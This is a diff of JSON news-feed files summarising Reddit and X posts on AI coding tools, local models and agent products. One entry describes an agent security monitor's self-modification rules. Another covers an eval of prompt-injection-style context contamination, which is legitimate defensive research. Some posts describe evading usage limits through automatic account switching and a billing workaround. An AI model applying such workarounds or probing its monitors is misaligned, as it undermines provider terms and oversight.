Link to workflow: [https://huggingface.co/ussaaron/workflows/blob/main/chroma\\_flux\\_character\\_transfer.json](https://huggingface.co/ussaaron/workflows/blob/main/chroma_flux_character_transfer.json) This workflow is the final result of a ton of experimentation to solve one problem: Using an image reference for a consistent character kneecaps the creativity of an image model. For example, if I want to create a cool cinematic shot with a specific style, including an image reference will reduce the image model's style output into a pretty narrow lane. Generally, the final image will share most of the stylistic elements present in the character image and that's not ideal. I selected the models for this workflow, because after a ton of testing, I determined that they…", + "category": "creative_tools" + }, + { + "title": "Vulkan or CPU llama cpp backend for local llm for coding/code assist", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tbb762/vulkan_or_cpu_llama_cpp_backend_for_local_llm_for/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-12T19:00:39.000Z", + "summary": "Hi all I recently started a new job and we're doing python development for a ci cd metadata consolidation library for analytics and we cannot use no stuff like claude code or codex or gh copilot or any model APIs (free or paid). I got a laptop with 32gb dual channel ddr5 5200mt/s RAM and i7 13gen 1365u running ubuntu. Now I tried so so many things firstly running llamacpp vulkan for qwen 3.5 9b q5 (got OOM'd somehow on ingesting a 340 line file while I set it up with a 24k context limit) then I tried gh copilot with ollama (ew but curiosity got the better of me but I couldn't get it to chat with code on the same qwen model). 
Tried Continue dev extension (OOMs and chat windows non responsive) and llama cpp vs code extension (chat window never showed up to work but the localhost url was live) I tried LMStudio and now it kinda works with qwen 3.5 4b q5 and qwen 3.5 9b q5 on CPU backend with the Roo extension on VS code rn but I'm thinking there has to be a better way to do things locally? Codebase is being demoed in 2-3 weeks for MVP so no one's adding wild new features but we're refactoring and a few files are 6000ish lines of test cases in pytest. I got a bunch of questions but I g…", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-13.json b/data/news-feed-2026-05-13.json new file mode 100644 index 0000000..dae933f --- /dev/null +++ b/data/news-feed-2026-05-13.json @@ -0,0 +1,277 @@ +{ + "generated": "2026-06-05T00:44:39.782Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-13", + "article_count": 15, + "archived_story_count": 656, + "articles": [ + { + "title": "I'm cooked. Anthropic just split \"--print\" mode to $/mo credits", + "url": "https://reddit.com/r/ClaudeAI/comments/1tcetsd/im_cooked_anthropic_just_split_print_mode_to_mo/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-13T22:16:44.000Z", + "summary": "So, my entire project concept of an autonomous self-monitoring self-orchestrating Kanban production system for Claude Code to live within has now potentially been torpedoed. I built the entire system on the premise that \\[tickets + agents + hooks + executors -> \"claude -p\" -> hands-free always-on productivity\\]. 
Now that Anthropic has announced that \"claude --print\" will, from June 15 forward, be considered \"programmatic\" SDK usage, all jobs launched using \"--print\" will get billed on a separate monthly credit bucket, and not be covered by the Pro/Max CLI tokens. This means that the $100 monthly credit, which will dry up quick, is effectively a stop-gap measure against those of us who realized early that you didn't need to run Claude Code yourself, you just needed an AI harness that would run Claude Code for you. It was a workaround for API-like control without API billing. Yet another AI gravy-train ride has come to an end. Boooooo. Unless... share your workaround ideas below!", + "category": "ai_tools" + }, + { + "title": "TextGen is now a native desktop app. Open-source alternative to LM Studio (formerly text-generation-webui).", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tbyyee/textgen_is_now_a_native_desktop_app_opensource/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch", + "open_source", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-13T13:00:32.000Z", + "summary": "Hi all, I have been making a lot of updates to my project, and I wanted to share them here. TextGen (previously text-generation-webui, also known as my username oobabooga or ooba) has been in development since December 2022, before LLaMa and llama.cpp existed. In the last two months, the project has evolved from a web UI to a **no-install desktop app** for Windows, Linux, and macOS with a polished UI. I have created a very minimal and elegant Electron integration for that. (Did you know LM Studio is also a web UI running over Electron? Not sure many people know that.) https://preview.redd.it/tk8oibhgjw0h1.png?width=1686&format=png&auto=webp&s=95c70f769766466885c8fdc6e7211525a371a920 It works like this: 1. 
You download a *portable build* from the [releases page](https://github.com/oobabooga/textgen/releases) 2. Unzip it 3. Double-click textgen 4. A window appears There is no installation, and no files are ever created outside the extracted folder. It's fully self-contained. All your chat histories and settings are stored in a `user_data` folder shipped with the build. There are builds for CUDA, Vulkan, CPU-only, Mac (Apple Silicon and Intel), and ROCm. Some differentiat…", + "category": "ai_models" + }, + { + "title": "Cross devices agent memory and context management?", + "url": "https://reddit.com/r/ClaudeAI/comments/1tbuwkm/cross_devices_agent_memory_and_context_management/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "api_update", + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-13T09:49:46.000Z", + "summary": "Hey, developers. Imagine you have 2 macs, one at your job, one at your home. Also you use codex and claude agents at same time, maybe one by one for what sort of tasks or issues. You have both of claude and chatgpt 20$ plan together, not API. How you guys are managing cross devices agent memory and context management? You tasked one agent, he did the job. You go home, continue working from different devices such as mac mini m4 16gb. You pull changes from github/gitlab. Start vscode, open terminal, type \"codex\" or \"claude\". New session, new agent knows nothing about what other agent in other device. Of course, maybe in-project [AGENTS.md](http://AGENTS.md) or [CLAUDE.md](http://CLAUDE.md) exists, maybe some latest \"CHANGELOG\" markdown file, or maybe even \"HANDOFF.md\" for what another session, another agents had been worked on. Maybe these markdowns are not enough for longer terms. 
I just wanna learn how others (10x devs) tackling such problem/worklow?", + "category": "ai_tools" + }, + { + "title": "The Trillion-Parameter Dilemma: MiMo-V2.5-Pro went open-source (1.02T params). Is self-hosting worth it when the API costs $70 for 387M tokens?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tbtinr/the_trillionparameter_dilemma_mimov25pro_went/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source", + "tool_update" + ], + "matching_tags": [ + "api_update", + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-13T08:31:25.000Z", + "summary": "Xiaomi open-sourced MiMo-V2.5-Pro. 1.02 trillion parameters, 42B active (MoE), 1M context, MIT license. On paper, this is exciting. In practice, I'm stuck on the math. **What I've been doing with it** I've been running V2.5-Pro via the API through Claude Code for autonomous coding sessions, not one-shot prompts, but extended multi-hour runs where the model picks its own tasks, debugs its own code, and keeps going across sessions using file-based memory. Over \\~125 sessions it built a full SaaS product from an empty repo: interactive API cost calculator with real-time pricing across 33 models and 10 providers, serverless API endpoints, Stripe checkout integration, embeddable widget system, RSS feed, newsletter infrastructure, SEO with structured data, and 60+ pages of content. 301 commits, all autonomous. It also ran quality audits on its own output: found issues across multiple files and fixed them without being asked. 
https://preview.redd.it/yuxs21bl7v0h1.jpg?width=384&format=pjpg&auto=webp&s=30ee7e8294f303d382e8312beb6d1bedbc9ef3de This isn't \"generate me a landing page.\" It's sustained autonomous development where the model maintains context across sessions, manages…", + "category": "ai_models" + }, + { + "title": "Simplified usage notes for the Agent tool - what's new in CC 2.1.140 (+622 tokens)", + "url": "https://reddit.com/r/ClaudeAI/comments/1tbldw4/simplified_usage_notes_for_the_agent_tool_whats/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "mcp", + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-13T01:39:12.000Z", + "summary": "* NEW: Tool Description: Agent (simple usage notes) — Simplified usage notes for the Agent tool covering when to delegate, fork behavior, resumption, worktree isolation, background execution, parallel launches, and context restrictions. * Agent Prompt: Security monitor for autonomous agent actions (second part) — Expands the Self-Modification rule from a vague description to an explicit list of agent-config paths (.claude/settings.json, CLAUDE.md, CLAUDE.local.md, .claude.json, .claude/rules/, .claude/hooks/, .claude/commands/, .claude/agents/, .claude/skills/, .claude/output-styles/, .claude/workflows/, .claude/routines/, .claude/scheduled\\_tasks.json, .claude/loop.md, .mcp.json), and carves out exceptions so files under .claude/worktrees/<name>/ are treated as ordinary project files and a project-specific .claude/ subdirectory outside the listed paths is not Self-Modification on its own. * Agent Prompt: Worker fork — Minor wording cleanup: drops \"in your system prompt\" from the \"default to forking\" reference so the rule applies generically to parent guidance. 
* Tool Description: Snooze (delay and reason guidance) — Adds an explicit warning not to schedule short-interval wa…", + "category": "ai_tools" + }, + { + "title": "Context Is Not Control, a source-boundary eval for LLMs", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tcb4r7/context_is_not_control_a_sourceboundary_eval_for/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-13T20:03:41.000Z", + "summary": "I’ve released a short paper / eval write-up called Context Is Not Control. The core idea is simple, LLMs don’t only fail because they lack context, they also fail when they treat the wrong context as controlling evidence. A retrieved document, prior message, user framing, fake authority claim, stale policy, or injected instruction - all can enter the context window, but not everything in context should be allowed to govern the answer. That distinction is a source-boundary problem. The paper focuses on cases where a model sees multiple pieces of text but has to preserve the difference between: \\* evidence \\* user framing \\* quoted material \\* source text \\* instruction-like contamination \\* unsupported claims \\* authoritative-looking but invalid context So the question, “did the model have enough context?”, instead becomes, “did the model correctly identify which context was admissible as evidence?” I think this is especially relevant to local/open model evaluation because it is a failure mode that can be tested across a spectrum of context formats. It’s also not dependent on frontier-model access. The paper is not claiming to solve hallucination. It makes a narrower argument that…", + "category": "ai_models" + }, + { + "title": "What kinds of models are people training with document data? 
[P]", + "url": "https://reddit.com/r/MachineLearning/comments/1tc92u9/what_kinds_of_models_are_people_training_with/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-13T18:52:46.000Z", + "summary": "We've helped some folks with synthetic data for a number of different projects and some of them for \"document data\". Like annotated PDFs, PNGs. Tax forms, health forms. Especially things with PII that are hard to get because of obvious privacy concerns. So, we came up with an engine to build a simulation and then extract the data from that simulation. We're trying to make sure our pipeline fits into a normal training pipeline, so I'm curious about your workflows or training pipelines. Today we output in formats consistent with FUNSD, BIO, YOLO (like v5 and higher), Donut, COCO, etc. Are we shooting for the right stuff, or are people training for something different that could use a different format or ontology or something? Other things we're trying to figure out are like is a PyPi SDK package useful, do people just use the API and not care, shut up and give me a zip file? :-)", + "category": "ai_research" + }, + { + "title": "A new monthly Agent SDK credit for Claude plans", + "url": "https://reddit.com/r/ClaudeAI/comments/1tc6nah/a_new_monthly_agent_sdk_credit_for_claude_plans/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-13T17:30:36.000Z", + "summary": "Starting June 15, paid Claude plans can claim a dedicated monthly credit for programmatic usage. 
The credit covers usage of: * Claude Agent SDK * `claude -p` * Claude Code GitHub Actions * Third-party apps built on the Agent SDK We've heard your questions about SDK and `claude -p` usage sharing your subscription rate limits with Claude Code and chat. Starting June 15, programmatic usage gets its own dedicated budget instead. Your subscription limits don't change, they're now reserved for interactive use. How it works: Claim the monthly credit once, and programmatic usage will draw from it automatically. When it runs out, you can keep going with usage credits (billed at API rates you turn on/off). If usage credits are turned off, usage pauses until the credit resets. Monthly credit amounts vary by plan: * Pro: $20 * Max 5x: $100 * Max 20x: $200 * Team Standard: $20/seat * Team Premium: $100/seat * Enterprise: Varies by seat type After you claim the credit, it resets with each billing cycle. Credits do not rollover. This means that third-party tools built on the Agent SDK like Conductor and OpenClaw work with your Claude plan, but will draw from your credit the same way your own scr…", + "category": "ai_tools" + }, + { + "title": "Anthropic launches Claude For Legal with practice-area plugins and MCP connectors to nine major legal platforms", + "url": "https://reddit.com/r/ClaudeAI/comments/1tbvje0/anthropic_launches_claude_for_legal_with/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "product_launch" + ], + "matching_tags": [ + "mcp", + "product_launch" + ], + "importance": 1, + "date": "2026-05-13T10:24:41.000Z", + "summary": "Anthropic rolled out Claude For Legal (May 12), adding practice-area plugins for commercial, employment, privacy, product, corporate, and AI governance law. The release also includes MCP connectors to tools lawyers already use: DocuSign, Ironclad, iManage, NetDocuments, LexisNexis, Thomson Reuters, Box, Everlaw, and LSuite. This follows the same playbook as Claude for Creative Work from April. 
Anthropic seems to be systematically building vertical-specific connector ecosystems rather than shipping a general-purpose tool. Each launch bundles domain plugins with integrations into the professional software stack people already have open. Curious whether anyone in legal has tried the practice-area plugins yet, specifically how they compare to just prompting base Claude with domain context. Source: [https://www.streetinsider.com/Reuters/Anthropic%2Bexpands%2BClaude%27s%2BAI%2Btools%2Bfor%2Blaw%2Bfirms%2C%2Blawyers/26476360.html](https://www.streetinsider.com/Reuters/Anthropic%2Bexpands%2BClaude%27s%2BAI%2Btools%2Bfor%2Blaw%2Bfirms%2C%2Blawyers/26476360.html)", + "category": "ai_tools" + }, + { + "title": "A fully autonomous browser runtime for any AI agents", + "url": "https://reddit.com/r/ClaudeAI/comments/1tbv937/a_fully_autonomous_browser_runtime_for_any_ai/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-13T10:09:06.000Z", + "summary": "Built (with Claude) an open source, fully autonomous browser runtime for agents. One critical issue I faced (I guess most of us do) is the inability to have a robust web search feature and this will help you direct towards that goal I hope - this AgenticBrowser needs zero human intervention. If a human can access it, the agent accesses it. Approach it as an idea or a base to build better stuff - maybe you will think of something even better than this - I built this after working with various web-search features for the Agentic framework (Jork) that I built a couple of months back - thought instead of making it just a Power of Jork, could be helpful to make it independent so any agent built on any framework can use it. No third party stuff is needed. 
Please take a look and let me know:", + "category": "ai_tools" + }, + { + "title": "I built a native macOS app to manage Claude Code sessions, accounts, and projects", + "url": "https://reddit.com/r/ClaudeAI/comments/1tbtpl2/i_built_a_native_macos_app_to_manage_claude_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-13T08:42:52.000Z", + "summary": "I've been using Claude Code daily for months and kept running into the same friction — juggling multiple terminal tabs for different projects, getting rate limited and manually switching accounts, losing work when I forgot to commit. So I built Claudy — a native macOS wrapper around Claude Code that handles all of that: * Multi-session: run multiple Claude Code sessions side by side with a proper sidebar * Auto account switching: when you hit the usage limit, it switches to another account automatically * Draft Commits: checkpoint your work mid-session and restore it anytime * Marketplace: install Skills, MCPs, and Commands in one click Built with SwiftUI + SwiftData, using libghostty (Ghostty's terminal core) for the terminal emulator. 
Just launched on Product Hunt today if anyone wants to check it out: [https://www.producthunt.com/products/claudy?launch=claudy](https://www.producthunt.com/products/claudy?launch=claudy) Happy to answer any questions about the build or the features!", + "category": "ai_tools" + }, + { + "title": "Fast mode for Claude Opus 4.7 is now available on the api.", + "url": "https://x.com/DailyXplorer/status/2054464151234228372", + "source": "X search / AI model updates", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-05-13T07:29:58.000Z", + "summary": "Fast mode for Claude Opus 4.7 is now available on the api.", + "category": "ai_models" + }, + { + "title": "Day 8 of $0 → $1 MRR (Live) ✦ Building Update Night 3/5 The leverage in AI right now is knowing what's out there. Telegram and Discord are great in the moment, bad at memory. So I'm building Update Night, the searchable home for every AI t…", + "url": "https://x.com/jiaweihq/status/2054463419722707134", + "source": "X search / Agent workflows", + "tags": [ + "mcp", + "developer_tool" + ], + "matching_tags": [ + "mcp", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-13T07:27:04.000Z", + "summary": "Day 8 of $0 → $1 MRR (Live) ✦ Building Update Night 3/5 The leverage in AI right now is knowing what's out there. Telegram and Discord are great in the moment, bad at memory. 
So I'm building Update Night, the searchable home for every AI tool, framework, and MCP server worth", + "category": "ai_agents" + }, + { + "title": "Local AI video pipeline review: Qwen3 27B beat Gemma 4 26B for tool calling", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tbof8k/local_ai_video_pipeline_review_qwen3_27b_beat/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-13T03:56:36.000Z", + "summary": "Watched All About AI's 100% local Fireship-style video automation experiment over the weekend (link in comments). A few things worth flagging if you're trying the same stack. Tool calling reliability was where the two diverged. Gemma 4 26B kept getting stuck in tool-call loops on his rig. Qwen 3.6 27B handled the same orchestration cleanly, no wasted thinking tokens. That gap is bigger than benchmark numbers suggest once you push real agent workflows through it. For images he ran Said Image Turbo locally off Hugging Face. Open weights, no API spend. Solid for meme-style cards. Portrait shots are where you'd probably reach for a Flux or Seedream call instead. Orchestration was OpenCode end-to-end. Context window climbed to 174K tokens and the to-do list wasn't fully completed in one shot. He stepped away from the rig mid-run and came back to a partial result, which is honestly the realistic version of \"AI did the work for me\". For people not wanting to run a 27B model locally, Qwen3 family is on a few inference providers so the API path keeps the same weights without the GPU upfront. Tool-call behavior holds since the model is the same. 
If you've benchmarked Qwen3 tool-calling fail…", + "category": "ai_models" + }, + { + "title": "I built a local GUI + AI builder for creating ComfyUI custom node packs", + "url": "https://reddit.com/r/StableDiffusion/comments/1tbk8zv/i_built_a_local_gui_ai_builder_for_creating/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-13T00:48:52.000Z", + "summary": "I've been working on ComfyUI Node Builder, a local app for building custom ComfyUI nodes without hand-writing all the boilerplate every time. The demo shows: 1. user describes a node idea 2. AI creates the node contract and Python 3. dependencies/files are updated 4. the pack is deployed and tested in ComfyUI It is open-source and local. The AI Builder can create nodes, edit generated files, explain validation errors, run checks, and request deploy only when deploy permission is enabled. GitHub: https://github.com/caoool/comfyui-node-canvas Landing page: https://caoool.github.io/comfyui-node-canvas/ Node ideas and feedback: https://github.com/caoool/comfyui-node-canvas/issues/2 I'd especially like feedback from people who build custom nodes: what node authoring workflow should this support next?", + "category": "creative_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-14.json b/data/news-feed-2026-05-14.json new file mode 100644 index 0000000..ce170a1 --- /dev/null +++ b/data/news-feed-2026-05-14.json @@ -0,0 +1,277 @@ +{ + "generated": "2026-06-05T00:44:39.946Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-14", + "article_count": 15, + "archived_story_count": 592, + "articles": [ + { + "title": "The updated Agents SDK is now available in TypeScript, with support for sandbox agents and an open-source harness built in.", + "url": "https://x.com/OpenAIDevs/status/2051725072873001338", + "source": "X / 
@openaidevs", + "tags": [ + "api_update", + "product_launch", + "open_source", + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "api_update", + "product_launch", + "open_source", + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-05T18:05:51.000Z", + "summary": "The updated Agents SDK is now available in TypeScript, with support for sandbox agents and an open-source harness built in.", + "category": "ai_tools" + }, + { + "title": "Computer-use MCP that can control multiple machines (Integrate with claude, Cursor, Codex or your custom harness)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tcpgsv/computeruse_mcp_that_can_control_multiple/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "mcp", + "open_source", + "agent_tool" + ], + "matching_tags": [ + "mcp", + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-14T06:13:22.000Z", + "summary": "Hey everyone, We built opendesk: it lets AI agents control your desktop using computer use MCP that can integrate with your custom workflow. Today we shipped something a bit wild: Your AI can now see, click, type, and navigate on a completely different computer, over your WiFi. You can pair them once and your agent can control it all from a single conversation. No cloud, account login, or servers in the middle. Everything stays on your local network, fully encrypted. Free and open source — Mac, Linux, and Windows. 
[github.com/vitalops/opendesk](http://github.com/vitalops/opendesk) Happy to answer any questions!", + "category": "ai_models" + }, + { + "title": "Simpler self hosted alt to Open WebUI", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tciwwt/simpler_self_hosted_alt_to_open_webui/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-14T01:05:45.000Z", + "summary": "Got Qwen3.6 27B running on my newly assembled 4x 3090 rig (s/o 3090-club) and I'm trying to get the people in my house to adopt the local workflow. Open WebUI has improved a lot in the recent updates, but I still found it pretty rough for non-technical people. It often feels more like a dev tool than a self-hosted ChatGPT-style app that \"just works\". I built overtchat to focus mainly on getting the core chat experience right: a polished ui, simple setup and fewer moving parts. The goal is not to compete on agentic workflow with LibreChat/LobeChat/OWUI but to provide a cleaner self-hosted interface for local models. Ships with its own tried & tested searxng config for web search, kokoro tts (no api keys needed). Single docker compose file. MIT licensed of course, no telemetry. Optimized for mobile as PWA. [Github](https://github.com/yoloyash/overtchat). Also being upfront - I write code for a living and have been actively reviewing/debugging/changing things, but I did use quite a lot of AI lol. I promise it's not slop tho 😿 . Feedback is welcome!", + "category": "ai_models" + }, + { + "title": "My AI runs 24/7 on Claude Code without -p. 
Here's the hook to do it yourself.", + "url": "https://reddit.com/r/ClaudeAI/comments/1tcicvb/my_ai_runs_247_on_claude_code_without_p_heres_the/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "product_launch", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "product_launch", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-14T00:42:20.000Z", + "summary": "**Saw the thread about the June 15 credit change. Built a drop-in `-p` replacement using hooks — no SDK credits needed.** edit: 29 stars! my first real repo \\o/ A lot of people are upset about losing subsidized `-p` usage. I built something that gives you the same stateless, one-message-at-a-time behavior — but in interactive mode, on your regular subscription. **How it works:** 1. A supervisor launches Claude Code in interactive mode 2. A stop hook polls an inbox file for new messages 3. When a message arrives, the hook injects it — **one message per session** 4. The agent processes it and writes a response to an outbox file 5. The supervisor kills the session and restarts with **fresh context** 6. Next message gets a clean session — true stateless operation, like `-p` When idle, the hook polls internally and blocks with minimal ticks (~20 tokens each). No context inflation from idle waiting. 
**What you get:** - **Stateless per message** — each task gets fresh context, just like `-p` - **No SDK credits** — interactive mode uses your subscription - **Autonomous** — watches inbox, processes messages, writes responses - **Cheap idle** — minimal token overhead while waiting for work…", + "category": "ai_tools" + }, + { + "title": "[N] LangChain Interrupt 2026 announcements [N]", + "url": "https://reddit.com/r/MachineLearning/comments/1td4v0a/n_langchain_interrupt_2026_announcements_n/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-14T17:20:27.000Z", + "summary": "LangChain just wrapped Day 1 of Interrupt 2026 and announced a few things worth knowing about: **SmithDB** — A purpose-built distributed database for agent observability. The problem they're solving: agent traces are getting too large and complex for general-purpose databases. SmithDB is built with Rust, Apache DataFusion, and Vortex, designed specifically for multimodal content and long-span tracing. They're reporting P50 latency of 92ms for loading trace trees and 400ms for full-text search, with up to 12x speedup over previous LangSmith performance. Architecture is object storage + small Postgres metadata store + stateless services, so it scales elastically and can be self-hosted. **Context Hub** — A centralized system for managing agent context (AGENTS.md files, skills, policies, memory) in LangSmith. The interesting part is they're working with MongoDB, Pinecone, Elastic, and Redis on an open standard for agent memory — covering episodic, semantic, and procedural memory with versioning and portability across frameworks. 
**Deep Agents v0.6** — New release includes ContextHubBackend integration, an installable code interpreter that gives agents a programmable workspace inside t…", + "category": "ai_research" + }, + { + "title": "A VERY lightweight open web-search tool for smaller local LLMs", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tczzga/a_very_lightweight_open_websearch_tool_for/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-05-14T14:32:02.000Z", + "summary": "Hey everyone, Been playing around with local agent setups lately, mostly Cline/Roo with smaller models, and web search kept annoying me. Not because it doesn’t work, but because it usually throws way too much random page text into the context. small models really don’t handle that gracefully lol. they start with a simple search and suddenly half the prompt is scraped garbage. So I built bad boy, TinySearch. It’s a small open-source MCP tool that does web search, crawls a few pages, chunks/retrieves/reranks the useful bits, and gives the agent a much smaller context blob instead of dumping full pages. Repo: [https://github.com/MarcellM01/TinySearch](https://github.com/MarcellM01/TinySearch) Uses DuckDuckGo, Crawl4AI, dense + BM25-style retrieval, reranking, MCP, and it can also run as a FastAPI server. On my setup (M4 Mac and old ahh lenovo thinkpad) it usually takes around 5–12 seconds end to end, depending on the query/machine Not trying to replace real search infra or anything. it’s more just a little local research layer for people building agents who don’t want to spin up a whole backend just to let the model look stuff up. 
Still rough in places, but it’s been useful enough fo…", + "category": "ai_models" + }, + { + "title": "Stable Diffusion WebUI Forge for AMD GPU", + "url": "https://reddit.com/r/StableDiffusion/comments/1tcyyb4/stable_diffusion_webui_forge_for_amd_gpu/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch", + "developer_tool" + ], + "matching_tags": [ + "product_launch", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-14T13:55:36.000Z", + "summary": "It was a f\\*cking chore that took almost 9 hours but i was able to FINALLLLLY MAKE IT !!!! I´ve reached it ! So... i am gonna share the files that made it possible. \"Proof pics\" \"[https://github.com/lllyasviel/stable-diffusion-webui-forge](https://github.com/lllyasviel/stable-diffusion-webui-forge)\" *The link should look like this* [\\>>> Click Here to Download One-Click Package (CUDA 12.1 + Pytorch 2.3.1) <<<](https://github.com/lllyasviel/stable-diffusion-webui-forge/releases/download/latest/webui_forge_cu121_torch231.7z) Once its done click on extract into a folder... There click on update.bat.... then from there find all the files \"down bellow in the picture\" see what the files are and then either download the google drive links or copy paste the text i wrote down on facebook link and delete the original. Then u gotta click thru the webui-user.bat , webui.bat and run.bat... I have no clue in what order though ... 
good luck xd https://preview.redd.it/pvx8zl18m31h1.png?width=1920&format=png&auto=webp&s=8d5f9e3ba9fd355f0f9fffff89cfae57f3bef293 [copy and paste it all into these files till u see these \\\\\"\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\\\\" in case u are copying i…", + "category": "creative_tools" + }, + { + "title": "Max20 user: anyone running Opus 4.7 as orchestrator + DeepSeek V4 as the worker via OpenRouter?", + "url": "https://reddit.com/r/ClaudeAI/comments/1tcvngy/max20_user_anyone_running_opus_47_as_orchestrator/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-14T11:43:58.000Z", + "summary": "I'm on the Max20 plan, thinking about a setup before I sink time into it. Want to hear from anyone actually running it, not theorycraft. **The idea:** Opus 4.7 in Claude Code as the orchestrator. It plans, breaks down tasks, reviews code quality, catches mistakes. The actual implementation, the bulk token spend, gets delegated to DeepSeek V4 Pro through OpenRouter. DeepSeek lands credibly close to Opus 4.7 on agentic coding benchmarks at a fraction of the output-token cost, so the bet is: keep Opus for the judgment-heavy parts, don't burn it on routine implementation. **I'm not expecting huge savings.** Realistically maybe an extra 30% (guessing here) effective Opus headroom if delegation works cleanly, and even less margin now that the limits situation has loosened a bit. So part of the question is genuinely whether 30% is worth the integration friction at all, or whether it's a fun idea that doesn't pay for itself. **Pre-empting the obvious responses, because I've already thought about these:** * *\"Just use Sonnet for the cheap parts.\"* The easy answer. 
But I'm specifically curious whether an external model's cost delta beats the friction, and whether anyone's actually measured…", + "category": "ai_tools" + }, + { + "title": "Automated AI researcher running locally with llama.cpp", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tcu5r8/automated_ai_researcher_running_locally_with/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-14T10:32:04.000Z", + "summary": "Hi everyone, I'm happy to share ml-intern, which is a harness for agents to have tighter integration with Hugging Face's open-source libraries (transformers, datasets, trl, etc) and Hub infrastructure: [https://github.com/huggingface/ml-intern](https://github.com/huggingface/ml-intern) The harness is quite simple (basically tools + system prompt) and we built it initially for Claude Opus. However, now that open models are getting really good at agentic workflows, I just added support for running ml-intern with local models via llama.cpp or ollama. As you can see in the video, Qwen3.6-35B-A3B is able to SFT a model end-to-end by orchestrating CPU/GPU sandboxes and jobs on the Hub. 
